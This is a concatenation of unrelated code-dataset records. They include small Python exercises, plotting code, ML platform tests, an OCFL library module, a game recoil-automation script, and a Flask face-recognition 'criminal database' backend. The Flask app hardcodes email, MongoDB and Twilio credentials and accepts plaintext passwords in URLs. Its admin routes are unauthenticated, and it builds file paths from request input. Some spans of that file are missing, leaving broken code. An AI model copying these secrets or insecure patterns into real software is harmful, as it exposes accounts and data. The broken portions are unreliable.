print(hint_string)\n else:\n print(\"That letter doesn't appear in the word\")\n user_attempts += 1\n if 
not(is_guess_complete) and user_attempts != 8:\n #print(user_attempts)\n print()\n # print('d')\n # print()\nelse:\n if player_decision_to_play == 'play':\n # print(\"is_guess_complete value: \", is_guess_complete)\n print(f\"You guessed the word {the_word}!\\nYou survived!\" if is_guess_complete == True else \"You lost!\")\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":6357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"546044414","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\ndf = pd.read_csv('data_tasks.csv')\nprint(df)\nprint(df.values[:,1])\ntimePoint=df.values[:,0]\ntemp=df.values[:,1]\nstDev=df.values[:,2]\nplt.figure(1)\nplt.errorbar(timePoint,temp,yerr=stDev,fmt=\"r8--\",linewidth=2,elinewidth=0.75,ecolor='k',capsize=3,capthick=1)\nplt.legend([\"Temperature with Standard Deviation\"],numpoints=1,loc=(\"upper left\"))\nplt.xlim((0,10))\nplt.xticks([1,2,3,4,5,6,7,8,9])\nplt.yticks([0,5,10,15,20])\nplt.title(\"Temperature Over Time\",fontsize=24)\nplt.xlabel('Time(Minutes)',fontweight = 'bold')\nplt.ylabel('Temperature (C)', fontweight = 'bold')\nplt.show()\n#plt.savefig('filename.png',dpi=600)\n\nplt.figure(2)\nplt.bar(timePoint,temp,yerr=stDev,align=\"center\",ecolor='k',capsize=8)\nplt.xticks([1,2,3,4,5,6,7,8,9])\nplt.yticks([0,5,10,15,20])\nplt.title(\"Temperature Over Time\",fontsize=24)\nplt.xlabel('Time(Minutes)',fontweight = 'bold')\nplt.ylabel('Temperature (C)', fontweight = 'bold')\nplt.show()\n#plt.savefig('filename.png',dpi=600)\n\n#### accidently split the file when I turned it into a csv, so have to read in twice, one for each sheet. This can be fixed by adding df=pd.read_excel('data_task.xlsx',sheet_name=...)\ndr=pd.read_csv('data_tasks2.csv')\nprint(dr)\ndef strToInt(lst):\n newLst=[]\n for i in lst:\n i = int(i)\n newLst.append(i)\n return newLst\ntime=strToInt(dr.values[1:,0])\nlvTemp=strToInt(dr.values[1:,1])\nlvStDev=strToInt(dr.values[1:,2])\ndgTemp=strToInt(dr.values[1:,3])\ndgStDev=strToInt(dr.values[1:,4])\ndTemp=strToInt(dr.values[1:,5])\ndStDev=strToInt(dr.values[1:,6])\nplt.figure(3)\nplt.errorbar(time,lvTemp,yerr=lvStDev,fmt=\"r8--\",linewidth=2,elinewidth=0.75,ecolor='k',capsize=3,capthick=1)\nplt.errorbar(time,dgTemp,yerr=dgStDev,fmt=\"g8--\",linewidth=2,elinewidth=0.75,ecolor='k',capsize=3,capthick=1)\nplt.errorbar(time,dTemp,yerr=dStDev,fmt=\"b8--\",linewidth=2,elinewidth=0.75,ecolor='k',capsize=3,capthick=1)\nplt.legend([\"Las Vegas\",\"Durango\",\"Denver\"],numpoints=2,loc=(\"upper left\"))\nplt.xlim((0,7))\nplt.xticks([1,2,3,4,5,6])\nplt.yticks([0,5,10,15,20,25,30,35,40,45,50])\nplt.title(\"Temperature Over Time\",fontsize=24)\nplt.xlabel('Time(Hours)',fontweight = 'bold')\nplt.ylabel('Temperature (C)', fontweight = 'bold')\nplt.show()\n#plt.savefig('filename.png',dpi=600)\nplt.figure(4)\nbarWidth = 0.25\nr1= np.arange(len(lvTemp))\nr2= [x+barWidth for x in r1]\nr3= [x+barWidth for x in r2]\nplt.bar(r1,lvTemp, color='#7f6d5f', width = barWidth, edgecolor = 'white', label = 'Las Vegas',yerr=lvStDev,capsize=5)\nplt.bar(r2,dgTemp, color='#557f2d', width = barWidth, edgecolor = 'white', label = 'Durango',yerr=dgStDev,capsize=5)\nplt.bar(r3,dTemp, color='#2d7f5e', width = barWidth, edgecolor = 'white', label = 'Denver',yerr=dStDev,capsize=5)\nplt.title('Temperature Over Time', fontsize=24)\nplt.xlabel('Time(Hours)',fontweight='bold')\nplt.ylabel('Temperature (C)', fontweight='bold')\nplt.xticks([r + barWidth for r in 
range(len(lvTemp))],[1,2,3,4,5,6])\nplt.legend()\nplt.show()\n#plt.savefig('filename.png',dpi=600)\n\n\n\n\n\n","sub_path":"hw18.py","file_name":"hw18.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"229469981","text":"import multiprocessing\nimport pymongo\nfrom pymongo import MongoClient\nfrom flask import Flask, request, jsonify\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport os\nimport json\nimport smtplib, ssl\nfrom flask_cors import CORS\nimport psutil\nimport subprocess\nimport time\nfrom binascii import a2b_base64\nimport atexit\napp = Flask(__name__)\nCORS(app)\nsender_email = \"rajlohith2@gmail.com\"\nreceiver_email = \"bharadwajkarthik7@gmail.com\"\nport = 465 # For SSL\npassword = \"virendersehwag\"\ncameraIPList = [0]\njobList = []\ncontext = ssl.create_default_context()\ncurrentNewUser = 0\ncrim_list = {}\n\n\ndef trainData():\n path = 'dataset'\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n detector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n print (\"\\n [INFO] Training faces. It will take a few seconds. Wait ...\")\n faces,ids = getImagesAndLabels(path)\n recognizer.train(faces, np.array(ids))\n\n # Save the model into trainer/trainer.yml\n recognizer.write('trainer/trainer.yml') # recognizer.save() worked on Mac, but not on Pi\n\n # Print the numer of faces trained and end program\n print(\"\\n [INFO] {0} faces trained. Exiting Program\".format(len(np.unique(ids))))\n\n\ndef trainDataAndRecognize(c_list,pid):\n path = 'dataset'\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n detector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n print (\"\\n [INFO] Training faces. It will take a few seconds. Wait ...\")\n faces,ids = getImagesAndLabels(path)\n recognizer.train(faces, np.array(ids))\n\n # Save the model into trainer/trainer.yml\n recognizer.write('trainer/trainer.yml') # recognizer.save() worked on Mac, but not on Pi\n\n # Print the numer of faces trained and end program\n print(\"\\n [INFO] {0} faces trained. Exiting Program\".format(len(np.unique(ids))))\n p = multiprocessing.Process(target = performPrediction,args = (\" \",0, c_list, pid))\n p.start()\n\n\ndef recordCriminalFaceData(filename, cameraIP, face_id):\n if filename == \" \":\n cam = cv2.VideoCapture(0)\n else:\n cam = cv2.VideoCapture(filename)\n\n cam.set(3, 640) # set video width\n cam.set(4, 480) # set video height\n\n face_detector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n print(\"\\n [INFO] Initializing face capture. Look the camera and wait ...\")\n # Initialize individual sampling face count\n count = 0\n\n while(True):\n time.sleep(0.1)\n ret, img = cam.read()\n #img = cv2.flip(img, -1) # flip video image vertically\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_detector.detectMultiScale(gray, 1.3, 5)\n for (x,y,w,h) in faces:\n cv2.rectangle(img, (x,y), (x+w,y+h), (255,0,0), 2) \n count += 1\n\n # Save the captured image into the datasets folder\n cv2.imwrite(\"dataset/User.\" + str(face_id) + '.' 
+ str(count) + \".jpg\", gray[y:y+h,x:x+w])\n if filename == \" \":\n if count >= 60:\n break\n\n # Do a bit of cleanup\n print(\"\\n [INFO] Exiting Program and cleanup stuff\")\n cam.release()\n\ndef performPredictionFromVideo(filepath):\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n recognizer.read('trainer/trainer.yml')\n cascadePath = \"haarcascade_frontalface_default.xml\"\n faceCascade = cv2.CascadeClassifier(cascadePath)\n #iniciate id counter\n id = 0\n\n # names related to ids: example ==> Marcelo: id=1, etc\n names = ['None', 'veer', 'Lohith', 'Ganapati', 'Z', 'W']\n cam = cv2.VideoCapture(filepath)\n # Initialize and start realtime video capture\n cam.set(3, 640) # set video widht\n cam.set(4, 480) # set video height\n\n # Define min window size to be recognized as a face\n minW = 0.1*cam.get(3)\n minH = 0.1*cam.get(4)\n\n while True:\n\n #img = cv2.flip(img, -1) # Flip vertically\n try:\n ret, img =cam.read()\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n except:\n return(crim_list)\n\n faces = faceCascade.detectMultiScale( \n gray,\n scaleFactor = 1.2,\n minNeighbors = 5,\n minSize = (int(minW), int(minH)),\n )\n\n for(x,y,w,h) in faces:\n\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), 2)\n\n id, confidence = recognizer.predict(gray[y:y+h,x:x+w])\n\n # Check if confidence is less them 100 ==> \"0\" is perfect match \n if (confidence < 100):\n confidence = int(round(100 - confidence))\n if int(confidence) >= 50:\n print(id)\n print(confidence)\n if id in c_list:\n if crim_list[id] Marcelo: id=1, etc\n names = ['None', 'Lohith', 'Lohith', 'Ganapati', 'Z', 'W']\n if filename == \" \":\n cam = cv2.VideoCapture(0)\n else:\n cam = cv2.VideoCapture(filename)\n # Initialize and start realtime video capture\n cam.set(3, 640) # set video widht\n cam.set(4, 480) # set video height\n\n # Define min window size to be recognized as a face\n minW = 0.1*cam.get(3)\n minH = 0.1*cam.get(4)\n\n while True:\n time.sleep(0.1)\n ret, img =cam.read()\n #img = cv2.flip(img, -1) # Flip vertically\n\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale( \n gray,\n scaleFactor = 1.2,\n minNeighbors = 5,\n minSize = (int(minW), int(minH)),\n )\n\n for(x,y,w,h) in faces:\n\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), 2)\n id, confidence = recognizer.predict(gray[y:y+h,x:x+w])\n\n # Check if confidence is less them 100 ==> \"0\" is perfect match \n if (confidence < 100 & id != 4):\n confidence = int(round(100 - confidence))\n if int(confidence) >= 25:\n if id in c_list:\n if c_list[id]NUL')\n return jsonify({})\n\n@app.route('/release-camera')\ndef release():\n p = multiprocessing.Process(target = performPrediction,args = (\" \",0, c_list, pid))\n p.start()\n return \" \"\n@app.route('/recording')\ndef recordRealTime():\n os.popen('TASKKILL /PID '+str(pid[0])+' /F 2>NUL')\n filter = {} \n collection = db[\"trial_new\"]\n doc_count = collection.count_documents(filter)\n currentNewUser = doc_count + 1\n recordCriminalFaceData(\" \", 0, currentNewUser)\n p2 = multiprocessing.Process(target = trainDataAndRecognize, args = (c_list, pid))\n p2.start()\n return jsonify({})\n\n@app.route('/recording-from-footage')\ndef recordingFromFootage():\n face_id = request.args['userid']\n recordCriminalFaceData(\"C:\\\\Users\\\\KS1\\\\Desktop\\\\sample.mp4\",0, face_id)\n\n\n@app.route('/recognize-from-footage')\ndef recognizeFromFootage():\n image_path = request.args['image-path']\n print(image_path)\n searchResult = 
performPredictionFromVideo(\"C:\\\\Users\\\\KS1\\\\Desktop\\\\\"+image_path)\n detectedList = []\n collection = db['trial_new']\n for x in searchResult.keys():\n print(x)\n res = collection.find_one({\"ID\" : int(x)},{ \"_id\": 0 })\n detectedList.append(res)\n print(detectedList) \n return jsonify(detectedList)\n\n\n@app.route('/full-list')\ndef fullList():\n response = []\n collection = db['trial_new']\n res = collection.find({},{ \"_id\": 0 ,'Image': 0})\n for i in res:\n response.append(i)\n return jsonify(response)\n \n\n@app.route('/recognition')\ndef recognizeRealTime():\n criminalsDetected = []\n collection = db[\"Crime_list\"]\n collection1 = db[\"timeline\"]\n res = collection.find({},{\"_id\":0,\"ID\": 1, \"Name\": 1, \"Recorded_Time\": 1})\n for i in res:\n message = \"The following criminal has been discovered in your area at camera 0:\"\n message += i['Name']\n criminalsDetected.append(i)\n res1 = collection.find_one_and_delete({\"ID\" : i[\"ID\"]})\n if collection1.find_one({\"ID\" : i[\"ID\"]}):\n collection1.find_one_and_update({\"ID\" : i[\"ID\"]}, {'$set': {\"Recorded_Time\": i[\"Recorded_Time\"]}})\n else:\n collection1.insert(res1)\n\n\n # client = Client(\"AC005dc1deb4ae1c3efd6265aeacf69997\", \"c4a9eb554443c3a39b8d8ba673f5a3a4\")\n # client.messages.create(to=\"+918553587952\", \n # from_=\"+12058439615\", \n # body=message)\n # with smtplib.SMTP_SSL(\"smtp.gmail.com\", port, context=context) as server:\n # server.login(\"rajlohith2@gmail.com\", password)\n # # TODO: Send email here\n # server.sendmail(sender_email, receiver_email, \"The following criminal has been discovered in your area at camera 0:\"+ i['Name'])\n print(criminalsDetected)\n return jsonify(criminalsDetected)\n\n@app.route('/search-by-id')\ndef searchById():\n detectedList = []\n id = request.args['id']\n collection = db[\"trial_new\"]\n res = collection.find_one({\"ID\" : int(id)},{ \"_id\": 0 })\n detectedList.append(res)\n return jsonify(detectedList)\n\n\n@app.route('/search-by-name')\ndef searchByName():\n detectedList = []\n fn = request.args['fn']\n ln = request.args['ln']\n collection = db[\"trial_new\"]\n res = collection.find_one({\"First_Name\" : fn, \"Last_Name\" : ln},{ \"_id\": 0 })\n detectedList.append(res)\n return jsonify(detectedList)\n\n@app.route('/admin-list')\ndef adminList():\n admins = []\n collection = db[\"admin_table\"]\n cursor = collection.find({},{ \"_id\": 0 })\n print(cursor)\n for document in cursor:\n print(document)\n admins.append(document)\n return jsonify(admins)\n\n\n@app.route('/add-criminal',methods = ['POST'])\ndef addCriminal():\n data = request.get_data()\n filter = {} \n collection = db[\"trial_new\"]\n doc_count = collection.count_documents(filter)\n currentNewUser = doc_count + 1\n print(type(data))\n data = json.loads(data)\n img = data['Image']\n\n # with open(\"C:\\\\Users\\\\rajlo\\\\front_end\\\\Images\\\\\"+ str(currentNewUser) +\".png\", \"wb\") as fh:\n # fh.write(img.decode('base64'))\n data.update({\"ID\" : currentNewUser})\n x = collection.insert_one(data)\n print(x.inserted_id)\n return jsonify({})\n\n@app.route('/login')\ndef login():\n user = request.args['user']\n password = request.args['pass']\n print(user)\n print(password)\n collection = db[\"admin_table\"]\n res = collection.find_one({\"User_id\" : user, \"password\" : password},{ \"_id\": 0 })\n print(res)\n if res== None:\n return jsonify({\"message\":\"failure\"})\n return jsonify({\"message\":\"success\"})\n\n\n@app.route('/add-user')\ndef addUser():\n user = 
request.args['user']\n password = request.args['pass']\n print(user)\n print(password)\n collection = db[\"admin_table\"]\n doc_count = collection.count_documents({})\n currentNewUser = doc_count + 1\n res = collection.insert_one({\"ID\": currentNewUser,\"User_id\" : user, \"password\" : password})\n print(res)\n return jsonify({\"message\":\"success\"})\n \n@app.route('/remove-user')\ndef removeUser():\n user = request.args['user']\n password = request.args['pass']\n print(user)\n print(password)\n collection = db[\"admin_table\"]\n res = collection.delete_one({\"User_id\" : user, \"password\" : password})\n print(res)\n return jsonify({\"message\":\"success\"})\n\n@app.route('/get-timeline')\ndef getTimeline():\n timelineList = []\n collection = db[\"timeline\"]\n res = collection.find({},{'_id':0})\n for i in res:\n timelineList.append(i)\n return jsonify(timelineList)\n\n\n@app.route('/get-home')\ndef getHome():\n timelineList = []\n collection = db[\"Crime_list\"]\n res = collection.count_documents({})\n return jsonify({'count': res})\n\n\n\nif __name__ == '__main__':\n manager = multiprocessing.Manager()\n c_list=manager.dict()\n pid = manager.list([0])\n path = 'dataset'\n\n recognizer = cv2.face.LBPHFaceRecognizer_create()\n detector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n print (\"\\n [INFO] Training faces. It will take a few seconds. Wait ...\")\n faces,ids = getImagesAndLabels(path)\n recognizer.train(faces, np.array(ids))\n\n # Save the model into trainer/trainer.yml\n recognizer.write('trainer/trainer.yml') # recognizer.save() worked on Mac, but not on Pi\n\n # Print the numer of faces trained and end program\n print(\"\\n [INFO] {0} faces trained. Exiting Program\".format(len(np.unique(ids))))\n p = multiprocessing.Process(target = performPrediction,args = (\" \",0, c_list, pid))\n p.start()\n client = MongoClient('mongodb+srv://rajlohith2:bit123@criminal-database-drxaw.mongodb.net/test?retryWrites=true&w=majority')\n db = client.CriminalDB\n app.run()","sub_path":"Back end/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"402136154","text":"import threading\nimport time\nimport cv2\nimport numpy as np\nfrom pykeyboard import PyKeyboardEvent\n\nfrom tab_detection.tab_detection import Tab_Detector\nfrom b_detection.b_detection import B_Detector\nfrom auto_press_gun.press import Auto_down\nfrom lists import *\nfrom all_state import State\nfrom utils import get_screen\n\n\nclass Key_Listener(PyKeyboardEvent):\n def __init__(self):\n PyKeyboardEvent.__init__(self)\n self.all_state = State()\n\n self.t = Tab_Detector(self.all_state)\n self.b = B_Detector(self.all_state)\n self.ad = Auto_down()\n\n def tap(self, keycode, character, press):\n\n if keycode == 9 and press: # tab\n self.ad.m_listener_stop()\n screen = get_screen()\n threading.Timer(0.01, self.t.detect, args=[screen]).start()\n threading.Timer(0.5, self.check_fire_mode).start()\n\n if keycode == 123 and press: # F12\n self.ad.m_listener_stop()\n\n if keycode == 71 and press: # F12\n self.ad.m_listener_stop()\n\n if keycode == 66 and not press: # b\n threading.Timer(0.1, self.check_fire_mode).start()\n\n if keycode == 49 and press: # 1\n self.all_state.gun_state = 1\n self.all_state.update()\n print('gun0_name', self.all_state.gun0)\n threading.Timer(0.1, self.check_fire_mode).start()\n\n if keycode == 50 and press: # 2\n self.all_state.gun_state = 2\n 
self.all_state.update()\n print('gun0_name', self.all_state.gun0)\n threading.Timer(0.1, self.check_fire_mode).start()\n\n def check_fire_mode(self):\n self.all_state.update()\n if self.all_state.gun0 in full_mode_gun:\n screen = get_screen()\n self.b.detect(screen)\n print(self.all_state.fire_mode1)\n if self.all_state.fire_mode1 == 'full' and self.all_state.gun0 is not None:\n self.ad.reset(self.all_state.gun0, self.all_state.scope0)\n print(self.all_state.gun0, self.all_state.scope0)\n self.ad.m_listener_run()\n else:\n self.ad.m_listener_stop()\n\n def escape(self, event):\n return False\n\n\nk = Key_Listener()\nk.run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"435240314","text":"\"\"\"\nFile: cities.py\nO.G. Author: C. D. Lima\n\"\"\"\n\nprompt = \"\\nPlease enter the name of a city you have visited: \"\nprompt += \"\\n(Enter 'quit' when you are finished.) \"\n\nwhile True:\n\tcity = input(prompt)\n\n\tif city == 'quit':\n\t\tbreak\n\telse:\n\t\tprint(\"I'd love to go to \" + city.title() + \"!\")\n\n","sub_path":"Documents/pythonfiles/python_c_c/Exer_Ch_7/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"624872388","text":"import pytest\nimport tempfile\nimport os\nimport time\n\nfrom rafiki.client import Client\nfrom rafiki.constants import ModelAccessRight, TrainJobStatus\nfrom test.utils import make_model_dev, make_app_dev, make_model, make_private_model, \\\n gen, superadmin, DATASET_TRAIN_FILE_PATH, DATASET_VAL_FILE_PATH\n\nTRAIN_JOB_TIMEOUT_SECS = 5 * 60\n \nclass TestTrainJobs():\n\n @pytest.fixture(scope='class')\n def app_dev_create_train_job_and_waited(self):\n (task, app, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info()\n app_dev = make_app_dev()\n\n # Create train job\n train_job = app_dev.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n assert 'id' in train_job\n train_job_id = train_job['id']\n\n # Wait until train job stops\n wait_until_train_job_stops(app, app_dev)\n\n return (app_dev, app, train_job_id, task)\n\n def test_app_dev_create_train_job(self, app_dev_create_train_job_and_waited):\n (app_dev, app, train_job_id, *args) = app_dev_create_train_job_and_waited\n app_dev: Client\n\n # View train job\n train_job = app_dev.get_train_job(app)\n assert train_job['id'] == train_job_id\n assert train_job['app'] == app\n assert 'status' in train_job\n \n # Get train job by user\n user = app_dev.get_current_user()\n user_id = user['id']\n train_jobs = app_dev.get_train_jobs_by_user(user_id)\n assert any([x['id'] == train_job_id for x in train_jobs])\n\n # Get train job by app\n train_jobs = app_dev.get_train_jobs_of_app(app)\n assert any([x['id'] == train_job_id for x in train_jobs])\n\n def test_app_dev_get_trials(self, app_dev_create_train_job_and_waited):\n (app_dev, app, *args) = app_dev_create_train_job_and_waited\n app_dev: Client\n\n # Get trials of stopped train job\n trials = app_dev.get_trials_of_train_job(app)\n assert len(trials) > 0\n\n # Get best trials of stopped train job\n best_trials = app_dev.get_best_trials_of_train_job(app)\n assert len(best_trials) > 0\n\n\n def test_app_dev_get_trial(self, app_dev_create_train_job_and_waited):\n (app_dev, app, *args) = app_dev_create_train_job_and_waited\n app_dev: 
Client\n\n # Get a trial\n trials = app_dev.get_trials_of_train_job(app)\n assert len(trials) > 0\n trial = trials[0]\n assert 'id' in trial\n trial_id = trial['id']\n\n # Get info for a trial\n trial = app_dev.get_trial(trial_id)\n assert trial['id'] == trial_id\n assert all([(x in trial) for x in ['knobs', 'status', 'score', 'datetime_started', 'datetime_stopped']])\n \n \n def test_app_dev_get_trial_logs(self, app_dev_create_train_job_and_waited):\n (app_dev, app, *args) = app_dev_create_train_job_and_waited\n app_dev: Client\n\n # Get a trial\n trials = app_dev.get_trials_of_train_job(app)\n assert len(trials) > 0\n trial = trials[0]\n assert 'id' in trial\n trial_id = trial['id']\n\n # Get logs for trial\n logs = app_dev.get_trial_logs(trial_id)\n assert len(logs) > 0\n\n\n def test_app_dev_create_2nd_app_version(self, app_dev_create_train_job_and_waited):\n (app_dev, app, task, *args) = app_dev_create_train_job_and_waited\n (_, _, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info(task=task) # Get another set of job info\n app_dev: Client\n \n # Create another train job\n train_job = app_dev.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n assert train_job['app'] == app\n assert train_job['app_version'] == 2 # 2nd version of the train job\n\n\n def test_multiple_app_devs_use_same_app(self, app_dev_create_train_job_and_waited):\n (app_dev, app, task, *args) = app_dev_create_train_job_and_waited\n (_, _, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info(task=task) # Get another set of job info\n app_dev2 = make_app_dev()\n \n # App dev 2 create another train job with same app\n train_job = app_dev2.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n assert train_job['app'] == app\n assert train_job['app_version'] == 1 # Should not increment\n\n\n def test_app_dev_cant_view_others_job(self, app_dev_create_train_job_and_waited):\n (app_dev, app, task, *args) = app_dev_create_train_job_and_waited\n app_dev: Client\n app_dev_user = app_dev.get_current_user()\n app_dev_id = app_dev_user['id']\n app_dev2 = make_app_dev()\n\n with pytest.raises(Exception):\n app_dev2.get_train_jobs_by_user(app_dev_id)\n\n\n def test_app_dev_stop_train_job(self):\n (task, app, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info()\n app_dev = make_app_dev()\n\n # Create train job\n train_job = app_dev.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n assert 'id' in train_job\n\n # Stop train job\n app_dev.stop_train_job(app)\n\n # Train job should have stopped\n train_job = app_dev.get_train_job(app)\n assert train_job['status'] == TrainJobStatus.STOPPED\n \n\n def test_app_dev_create_train_job_with_gpu(self):\n (task, app, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info()\n budget['GPU_COUNT'] = 1 # Activate GPU\n app_dev = make_app_dev()\n \n # Create train job\n train_job = app_dev.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n assert 'id' in train_job\n\n # Wait until train job stops\n wait_until_train_job_stops(app, app_dev)\n\n # Train job should have stopped without error\n train_job = app_dev.get_train_job(app)\n assert train_job['status'] == TrainJobStatus.STOPPED\n\n # Train job should have trials\n trials = app_dev.get_trials_of_train_job(app)\n assert len(trials) > 0\n\n\n def test_app_dev_cant_use_private_model(self):\n (task, 
app, model_id, train_dataset_uri, val_dataset_uri, budget) = make_train_job_info()\n model_id = make_private_model() # Have private model created\n app_dev = make_app_dev()\n\n # Can't create train job with private model\n with pytest.raises(Exception):\n app_dev.create_train_job(app, task, train_dataset_uri, val_dataset_uri, budget, models=[model_id])\n\n\ndef make_train_job_info(task=None):\n task = task or gen()\n app = gen()\n model_id = make_model(task=task)\n train_dataset_uri = DATASET_TRAIN_FILE_PATH\n val_dataset_uri = DATASET_VAL_FILE_PATH\n budget = { 'MODEL_TRIAL_COUNT': 1 }\n\n return (task, app, model_id, train_dataset_uri, val_dataset_uri, budget)\n\n\ndef wait_until_train_job_stops(app, client: Client):\n length = 0\n timeout = TRAIN_JOB_TIMEOUT_SECS\n tick = 1\n\n while True:\n train_job = client.get_train_job(app)\n status = train_job['status']\n if status not in [TrainJobStatus.STARTED, TrainJobStatus.RUNNING]:\n # Train job has stopped\n return\n \n # Still running...\n if length >= timeout:\n raise TimeoutError('Train job is running for too long')\n\n length += tick\n time.sleep(tick)\n","sub_path":"test/test_train_jobs.py","file_name":"test_train_jobs.py","file_ext":"py","file_size_in_byte":7576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"550549496","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.14-x86_64/egg/ocfl/object.py\n# Compiled at: 2020-04-20 18:40:35\n# Size of source mod 2**32: 27310 bytes\n\"\"\"Core of OCFL Object library.\"\"\"\nimport copy, hashlib, json, os, os.path, re, logging\nfrom shutil import copyfile\nimport sys\ntry:\n from urllib.parse import quote as urlquote\nexcept ImportError:\n from urllib import quote as urlquote\n\nfrom .digest import file_digest, normalized_digest\nfrom .inventory_validator import InventoryValidator\nfrom .object_utils import remove_first_directory, make_unused_filepath, next_version, add_object_args\nfrom .namaste import Namaste\nfrom .validator import OCFLValidator\nfrom .version import VersionMetadata\n\nclass ObjectException(Exception):\n __doc__ = 'Exception class for OCFL Object.'\n\n\nclass Object(object):\n __doc__ = 'Class for handling OCFL Object data and operations.'\n\n def __init__(self, id=None, content_directory='content', digest_algorithm='sha512', filepath_normalization='uri', skips=None, forward_delta=True, dedupe=True, lax_digests=False, ocfl_version='draft', fixity=None, fhout=sys.stdout):\n \"\"\"Initialize OCFL builder.\n\n Parameters:\n forward_delta - set False to turn off foward delta\n dedupe - set False to turn off dedupe within versions\n fixity - list of fixity types to add as fixity section\n fhout - optional overwrite of STDOUT for print outputs\n \"\"\"\n self.id = id\n self.content_directory = content_directory\n self.digest_algorithm = digest_algorithm\n self.filepath_normalization = filepath_normalization\n self.skips = set() if skips is None else set(skips)\n self.forward_delta = forward_delta\n self.dedupe = dedupe\n self.ocfl_version = ocfl_version\n self.fixity = fixity\n self.lax_digests = lax_digests\n self.src_files = {}\n self.fhout = fhout\n\n def parse_version_directory(self, dirname):\n \"\"\"Get version number from version directory name.\"\"\"\n m = re.match('v(\\\\d{1,5})$', dirname)\n if not m:\n raise Exception('Bad version directory name: %s' % dirname)\n v = 
int(m.group(1))\n if v == 0:\n raise Exception('Bad version directory name: %s, v0 no allowed' % dirname)\n return v\n\n def digest(self, filename):\n \"\"\"Digest for file filename.\"\"\"\n return file_digest(filename, self.digest_algorithm)\n\n def map_filepath(self, filepath, vdir, used):\n \"\"\"Map source filepath to a name within object.\n\n The purpose of the mapping might be normalization, sanitization,\n content distribution, or something else.\n\n Parameters:\n filepath - the source filepath\n vdir - the current version directory\n used - disctionary used to check whether a given vfilepath has\n been used already\n\n Returns:\n vfilepath - the version filepath for this content that starts\n with vdir/content_directory/\n \"\"\"\n if self.filepath_normalization == 'uri':\n filepath = urlquote(filepath)\n if filepath[0] == '.':\n filepath = '%2E' + filepath[1:]\n else:\n if self.filepath_normalization == 'md5':\n filepath = hashlib.md5(filepath.encode('utf-8')).hexdigest()[0:16]\n else:\n if self.filepath_normalization is not None:\n raise Exception(\"Unknown filepath normalization '%s' requested\" % self.filepath_normalization)\n vfilepath = os.path.join(vdir, self.content_directory, filepath)\n if vfilepath in used:\n vfilepath = make_unused_filepath(vfilepath, used)\n return vfilepath\n\n def start_inventory(self):\n \"\"\"Create inventory start with metadata from self.\"\"\"\n inventory = {'id':self.id, \n 'type':'https://ocfl.io/1.0/spec/#inventory', \n 'digestAlgorithm':self.digest_algorithm, \n 'versions':{}, 'manifest':{}}\n if self.content_directory != 'content':\n inventory['contentDirectory'] = self.content_directory\n elif self.fixity is not None and len(self.fixity) > 0:\n inventory['fixity'] = {}\n for fixity_type in self.fixity:\n inventory['fixity'][fixity_type] = {}\n\n else:\n self.fixity = None\n return inventory\n\n def add_version(self, inventory, srcdir, vdir, metadata=None):\n \"\"\"Add to inventory data for new version based on files in srcdir.\n\n Parameters:\n inventory - the inventory up to (vdir-1)\n srcdir - the directory path where the files for this new version exist,\n including any version directory that might be present\n vdir - the version directory that these files are being added in\n metadata - a VersionMetadata object\n\n Returns:\n manifest_to_srcfile - dict mapping from paths in manifest to the full\n path of the source file that should be include in the content for\n this new version\n \"\"\"\n state = {}\n manifest = inventory['manifest']\n digests_in_version = {}\n manifest_to_srcfile = {}\n inv_file = srcdir + '_inventory.json'\n if os.path.isfile(inv_file):\n metadata.from_inventory_file(inv_file, vdir)\n for dirpath, dirnames, filenames in os.walk(srcdir, followlinks=True):\n for filename in sorted(filenames):\n filepath = os.path.join(dirpath, filename)\n print('-o-> ' + filepath)\n sfilepath = os.path.relpath(filepath, srcdir)\n vfilepath = self.map_filepath(sfilepath, vdir, manifest_to_srcfile)\n digest = self.digest(filepath)\n if digest not in state:\n state[digest] = []\n state[digest].append(sfilepath)\n if self.forward_delta:\n if digest in manifest:\n print('... already have content for digest %s' % digest)\n continue\n if digest not in 